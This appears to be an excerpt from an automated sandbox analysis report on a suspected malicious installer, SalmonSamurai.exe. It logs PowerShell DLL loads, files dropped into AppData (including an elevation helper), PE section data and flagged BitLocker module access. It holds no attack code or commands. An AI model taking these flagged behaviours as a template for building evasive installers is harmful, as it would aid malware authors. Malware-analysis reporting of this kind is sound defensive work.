Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SalmonSamurai.exeStatic PE information: certificate valid
Source: SalmonSamurai.exeStatic file information: File size 74023200 > 1048576
Source: SalmonSamurai.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D230C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb&0$ source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ft.Automation.pdbK source: powershell.exe, 00000011.00000002.1738372742.000001AAEA38D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D230C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dllon.pdbJ source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000013.00000002.1697930434.000001E0D2620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000013.00000002.1590406499.000001E0B82EA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000013.00000002.1697930434.000001E0D2620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soapon.pdb+ source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .00cfg
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .gxfg
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .retplne
Source: SalmonSamurai.exe.0.drStatic PE information: section name: .rodata
Source: SalmonSamurai.exe.0.drStatic PE information: section name: CPADinfo
Source: SalmonSamurai.exe.0.drStatic PE information: section name: LZMADEC
Source: SalmonSamurai.exe.0.drStatic PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txtJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
